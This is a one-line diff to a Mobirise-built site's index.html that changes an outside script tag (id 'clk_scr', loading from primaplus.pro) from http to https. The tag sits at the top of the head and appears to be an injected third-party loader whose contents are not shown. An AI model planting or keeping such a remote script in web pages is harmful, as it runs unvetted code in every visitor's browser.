--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html  >
 <head>
-<script id="clk_scr" src="http://primaplus.pro/js2/script.js"></script>
+<script id="clk_scr" src="https://primaplus.pro/js2/script.js"></script>
   <!-- Site made with Mobirise Website Builder v4.12.3, https://mobirise.com -->
   <meta charset="UTF-8">
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
